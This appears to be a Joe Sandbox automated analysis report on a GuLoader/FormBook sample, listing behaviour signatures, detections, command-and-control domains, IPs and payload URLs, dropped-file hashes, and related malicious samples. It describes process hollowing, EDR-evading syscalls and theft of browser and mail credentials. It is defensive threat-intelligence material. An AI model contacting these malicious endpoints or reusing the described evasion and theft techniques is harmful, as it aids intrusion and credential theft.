            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564415 Sample: Salmebogs(1).exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 43 www.topkapiescortg.xyz 2->43 45 www.openhorizons.pro 2->45 47 7 other IPs or domains 2->47 67 Suricata IDS alerts for network traffic 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 Yara detected FormBook 2->71 75 3 other signatures 2->75 11 Salmebogs(1).exe 1 14 2->11         started        signatures3 73 Performs DNS queries to domains with low reputation 43->73 process4 file5 37 C:\Users\user\AppData\...37euralgiform.Pre, Unicode 11->37 dropped 87 Suspicious powershell command line found 11->87 15 powershell.exe 30 11->15         started        signatures6 process7 file8 39 C:\Users\user\AppData\...\Stemmeurnes.exe, PE32 15->39 dropped 41 C:\Users\...\Stemmeurnes.exe:Zone.Identifier, ASCII 15->41 dropped 57 Early bird code injection technique detected 15->57 59 Writes to foreign memory regions 15->59 61 Sample uses process hollowing technique 15->61 63 4 other signatures 15->63 19 Stemmeurnes.exe 6 15->19         started        23 conhost.exe 15->23         started        signatures9 process10 dnsIp11 49 212.162.149.63, 49724, 80 UNREAL-SERVERSUS Netherlands 19->49 77 Multi AV Scanner detection for dropped file 19->77 79 Machine Learning detection for dropped file 19->79 81 Maps a DLL or memory area into another process 19->81 83 2 other signatures 19->83 25 MLvvJtVcRex.exe 19->25 injected signatures12 process13 signatures14 85 Found direct / indirect Syscall (likely to bypass EDR) 25->85 28 svchost.exe 13 25->28         started        process15 signatures16 89 Tries to steal Mail credentials (via file / registry access) 28->89 91 Tries to harvest and steal browser information (history, passwords, etc) 28->91 93 Modifies the context of a thread in another process (thread injection) 28->93 95 2 other signatures 28->95 31 MLvvJtVcRex.exe 28->31 injected 35 firefox.exe 28->35         started        process17 dnsIp18 51 www.openhorizons.pro 69.57.163.64, 49730, 49731, 49732 FORTRESSITXUS United States 31->51 53 carhireheaven.online 165.22.38.185, 49725, 80 DIGITALOCEAN-ASNUS United States 31->53 55 4 other IPs or domains 31->55 65 Found direct / indirect Syscall (likely to bypass EDR) 31->65 signatures19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Salmebogs(1).exe21%ReversingLabsWin32.Trojan.GuLoader
            Salmebogs(1).exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe21%ReversingLabsWin32.Trojan.GuLoader

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.thezensive.work/lo90/0%Avira URL Cloudsafe
            http://www.topkapiescortg.xyz/vn7h/0%Avira URL Cloudsafe
            http://www.carhireheaven.online/rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlat0%Avira URL Cloudsafe
            http://212.162.149.63/kybqONxtMLpRGBHO51.bin0%Avira URL Cloudsafe
            http://www.dy01urj.pro/f425/0%Avira URL Cloudsafe
            http://212.162.149.63/ta0%Avira URL Cloudsafe
            http://crl.mid0%Avira URL Cloudsafe
            http://www.lucelight.info/ygu8/0%Avira URL Cloudsafe
            http://www.lucelight.info/ygu8/?8jT4kL=6HX0pmqtTVFjYjbLFt/yw4MxugQtjNvaEbfW/ZeSy8/cybJx0DosxviF56NjIHg0asFrzBUBKTTcW4Uj0RlF+pFAgVt32CComlEiYuQYw0DYsahVS2dFldI6ksNi8RRjHVW8r7I=&-pmdf=w6-PZpOHNlat0%Avira URL Cloudsafe
            http://www.topkapiescortg.xyz/vn7h/?8jT4kL=on6JE3FYRodJdM1x+4K+5pUS6O0RuQSqvYhTcMVIKJIhdKL5ISeoZA3c+V1uZgRVwgcePlNUSouM/yl9PRA+Tn5EEaKvDdwkQb22NNObOIpoGQnkHbmo3oyXaFXcK2lCv3NncTU=&-pmdf=w6-PZpOHNlat0%Avira URL Cloudsafe
            http://212.162.149.63/kybqONxtMLpRGBHO51.bin_0%Avira URL Cloudsafe
            http://www.dy01urj.pro/f425/?8jT4kL=6oWh1fqdSfng0Pjmt4p2Tl7mRdUP/1qrFSh3ZEd4swSnlT4IHTKt/yR7Nn5bH6bsG60HcQ1M+zXYt/C+9G9vrVx9LvwHKTPPcluFpxFk0AZ9f6fsXKxFHhnFilmSMHOH+bDioKs=&-pmdf=w6-PZpOHNlat0%Avira URL Cloudsafe
            http://www.openhorizons.pro/ir2n/0%Avira URL Cloudsafe
            http://www.thezensive.work/lo90/?8jT4kL=gXkjcBwJoJePUPP73D1k4nKT6J/2tj39H9Xv2qxWyJxgoYDAQfNx/5lL6sEukOnTtNLESQT8ae5yfHdk/AMkgP5+8UR/3nx2NgYPLGwKf77yIeyRgEv4SQMvZxGfrREQVLHKYMQ=&-pmdf=w6-PZpOHNlat0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.topkapiescortg.xyz
            		104.21.6.17
            		truetrue
              		unknown
              thezensive.netlify.app
              		3.75.10.80
              		truetrue
                		unknown
                www.lucelight.info
                		103.168.172.37
                		truetrue
                  		unknown
                  www.openhorizons.pro
                  		69.57.163.64
                  		truetrue
                    		unknown
                    carhireheaven.online
                    		165.22.38.185
                    		truetrue
                      		unknown
                      www.dy01urj.pro
                      		154.88.22.104
                      		truetrue
                        		unknown
                        www.carhireheaven.online
                        		unknown
                        		unknownfalse
                          		unknown
                          www.kevmedia.online
                          		unknown
                          		unknownfalse
                            		unknown
                            www.thezensive.work
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.carhireheaven.online/rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlattrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.lucelight.info/ygu8/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.thezensive.work/lo90/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.topkapiescortg.xyz/vn7h/?8jT4kL=on6JE3FYRodJdM1x+4K+5pUS6O0RuQSqvYhTcMVIKJIhdKL5ISeoZA3c+V1uZgRVwgcePlNUSouM/yl9PRA+Tn5EEaKvDdwkQb22NNObOIpoGQnkHbmo3oyXaFXcK2lCv3NncTU=&-pmdf=w6-PZpOHNlattrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.topkapiescortg.xyz/vn7h/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.dy01urj.pro/f425/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.lucelight.info/ygu8/?8jT4kL=6HX0pmqtTVFjYjbLFt/yw4MxugQtjNvaEbfW/ZeSy8/cybJx0DosxviF56NjIHg0asFrzBUBKTTcW4Uj0RlF+pFAgVt32CComlEiYuQYw0DYsahVS2dFldI6ksNi8RRjHVW8r7I=&-pmdf=w6-PZpOHNlattrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://212.162.149.63/kybqONxtMLpRGBHO51.binfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.openhorizons.pro/ir2n/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.thezensive.work/lo90/?8jT4kL=gXkjcBwJoJePUPP73D1k4nKT6J/2tj39H9Xv2qxWyJxgoYDAQfNx/5lL6sEukOnTtNLESQT8ae5yfHdk/AMkgP5+8UR/3nx2NgYPLGwKf77yIeyRgEv4SQMvZxGfrREQVLHKYMQ=&-pmdf=w6-PZpOHNlattrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.dy01urj.pro/f425/?8jT4kL=6oWh1fqdSfng0Pjmt4p2Tl7mRdUP/1qrFSh3ZEd4swSnlT4IHTKt/yR7Nn5bH6bsG60HcQ1M+zXYt/C+9G9vrVx9LvwHKTPPcluFpxFk0AZ9f6fsXKxFHhnFilmSMHOH+bDioKs=&-pmdf=w6-PZpOHNlattrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.midpowershell.exe, 00000002.00000002.3448936955.0000000002C26000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://nsis.sf.net/NSIS_ErrorErrorSalmebogs(1).exe, 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Salmebogs(1).exe, 00000000.00000000.2271359918.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Stemmeurnes.exe, 00000006.00000000.3447638821.000000000040A000.00000008.00000001.01000000.00000007.sdmpfalse
                                              		high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdStemmeurnes.exe, 00000006.00000001.3448532289.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                  		high
                                                  http://212.162.149.63/taStemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://nsis.sf.net/NSIS_Errorsvchost.exefalse
                                                    		high
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.3449858507.0000000004A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://212.162.149.63/kybqONxtMLpRGBHO51.bin_Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdStemmeurnes.exe, 00000006.00000001.3448532289.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3449858507.0000000004A91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                69.57.163.64
                                                                		www.openhorizons.proUnited States
                                                                		25653FORTRESSITXUStrue
                                                                103.168.172.37
                                                                		www.lucelight.infounknown
                                                                		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                3.75.10.80
                                                                		thezensive.netlify.appUnited States
                                                                		16509AMAZON-02UStrue
                                                                165.22.38.185
                                                                		carhireheaven.onlineUnited States
                                                                		14061DIGITALOCEAN-ASNUStrue
                                                                154.88.22.104
                                                                		www.dy01urj.proSeychelles
                                                                		40065CNSERVERSUStrue
                                                                104.21.6.17
                                                                		www.topkapiescortg.xyzUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                212.162.149.63
                                                                		unknownNetherlands
                                                                		64236UNREAL-SERVERSUSfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1564415
                                                                Start date and time:2024-11-28 10:03:04 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 11m 40s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:9
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Salmebogs(1).exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@10/12@8/7
                                                                EGA Information:
                                                                • Successful, ratio: 60%
                                                                HCA Information:
                                                                • Successful, ratio: 88%
                                                                • Number of executed functions: 157
                                                                • Number of non-executed functions: 63
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target MLvvJtVcRex.exe, PID 6620 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 5608 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: Salmebogs(1).exe

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                04:04:10API Interceptor38x Sleep call for process: powershell.exe modified
                                                                04:07:06API Interceptor2915403x Sleep call for process: svchost.exe modified
                                                                10:04:00Task SchedulerRun new task: {A4305397-4CCA-4818-9D94-369F4B660D06} path: .

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                103.168.172.37firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                • 103.168.172.37/
                                                                Fzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                                • cloud.hgriggs.com/
                                                                Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                • www.jleabres.com/w977/
                                                                jlsvOH1c8bSRKqM.exeGet hashmaliciousFormBookBrowse
                                                                • www.jleabres.com/blhi/
                                                                eNXDCIvEXI.exeGet hashmaliciousFormBookBrowse
                                                                • www.celebration24.co.uk/mcz6/
                                                                H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                                                • www.celebration24.co.uk/mcz6/
                                                                Factura (3).exeGet hashmaliciousFormBookBrowse
                                                                • www.celebration24.co.uk/mcz6/
                                                                PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                • www.celebration24.co.uk/pq0o/
                                                                3.75.10.80oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                  oIGNK22EVW.exeGet hashmaliciousUnknownBrowse
                                                                    https://www.google.com/url?q=https%3A%2F%2Ftrimmer.to%2FPlfGc&sa=D&sntz=1&usg=AOvVaw1DTVuO2H6PM4yLoWCUd_D9Get hashmaliciousHTMLPhisherBrowse
                                                                      104.21.6.17INHSBC3W29006407_-_T01_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • www.crashed.boats/ls02/?j2Md=BAvHs7FiF/mMvKQeHNkw3auVO7Mi81CusJrfc9abihgBy6gpaapEmgjs0/tKd+lX+MtJ&9r=XZLP9J_Xp
                                                                      HB-252-23.exeGet hashmaliciousFormBookBrowse
                                                                      • www.crashed.boats/ls02/?2dqLW6k=BAvHs7EWEPj5waIbHtkw3auVO7Mi81CusJrfc9abihgBy6gpaapEmgjs0/BFCLdX56hcnU+qcw==&oJE0=YVMhn0jpRZeD3pY

                                                                      Domains

                                                                      No context

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      AARNET-AS-APAustralianAcademicandResearchNetworkAARNespc.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.33.61.53
                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 103.162.17.26
                                                                      arm5.elfGet hashmaliciousMiraiBrowse
                                                                      • 134.148.54.103
                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.33.61.81
                                                                      spc.elfGet hashmaliciousMiraiBrowse
                                                                      • 103.166.98.133
                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                      • 103.183.208.4
                                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                      • 103.179.160.17
                                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                      • 157.85.15.128
                                                                      nabarm.elfGet hashmaliciousUnknownBrowse
                                                                      • 103.161.199.61
                                                                      arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 103.176.106.72
                                                                      AMAZON-02USbotx.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 18.137.130.168
                                                                      botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 18.153.222.87
                                                                      nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                      • 54.64.252.235
                                                                      nabppc.elfGet hashmaliciousUnknownBrowse
                                                                      • 54.109.121.89
                                                                      Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 52.60.87.163
                                                                      nabmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 3.168.247.140
                                                                      nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                      • 44.226.239.16
                                                                      nabarm.elfGet hashmaliciousUnknownBrowse
                                                                      • 54.126.138.72
                                                                      nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 44.233.171.208
                                                                      nabx86.elfGet hashmaliciousUnknownBrowse
                                                                      • 54.171.230.55
                                                                      FORTRESSITXUShttp://dimfa.elcompanies.digitalillustra.comGet hashmaliciousUnknownBrowse
                                                                      • 65.181.111.144
                                                                      RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      TCP-F02-24-1437-HRSC24110281.exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      Indocount Invoice Amendment.exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                      • 69.57.163.227
                                                                      DIGITALOCEAN-ASNUSloligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 167.175.208.27
                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 162.243.214.132
                                                                      1ZFDEXA938MKSUBA.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                      • 68.183.112.81
                                                                      1ZFDEXA938MKSUBA.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                      • 68.183.112.81
                                                                      1ZFDEXA938MKSUBASJKA.svgGet hashmaliciousWinSearchAbuseBrowse
                                                                      • 68.183.112.81
                                                                      RFQ-00948-STELLION-878378.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                      • 206.189.218.238
                                                                      jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                      • 178.62.248.126
                                                                      sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 167.71.167.230
                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 128.199.34.220
                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 138.68.143.69

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):53158
                                                                      Entropy (8bit):5.062687652912555
                                                                      Encrypted:false
                                                                      SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                      MD5:5D430F1344CE89737902AEC47C61C930
                                                                      SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                      SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                      SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                      C:\Users\user\AppData\Local\Temp\72945936

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1239949490932863
                                                                      Encrypted:false
                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Category:dropped
                                                                      Size (bytes):552510
                                                                      Entropy (8bit):7.8978229070875745
                                                                      Encrypted:false
                                                                      SSDEEP:12288:rqxGbI7E2Rg+JZDFBRTvfN2fhepnatv8JvtHmv:U7E2RDn5BRTvEhepngMvh
                                                                      MD5:B5948D19A341BC22C750D129F41A55AE
                                                                      SHA1:D21D67D41F27ECA213FB81F2C5D68FDEE27D815D
                                                                      SHA-256:0F1EC8D7D4CF99BCE4BF482009F456A2E210C6D40D22802A196A2151170780EE
                                                                      SHA-512:4C0507EC93CC6BC82C718F09628EB9D7694F354BA3AE927EFFE2EB94B5A2CCFE8FD157FD3CF1BC69FE3B656F11921E83546C013452107C5DB4B0FC3D51C8C69C
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!@G.@...@...@../Oq..@...@/.J@../Os..@...c...@..+F(..@..Rich.@..........PE..L....{.W.................b....:.....}2............@..........................p>...........@..........................................P<..............................................................................................................text...Ta.......b.................. ..`.rdata...............f..............@..@.data.....9..........z..............@....ndata........:..........................rsrc........P<.....................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bczoxgwn.wwx.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bg303c5i.swb.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
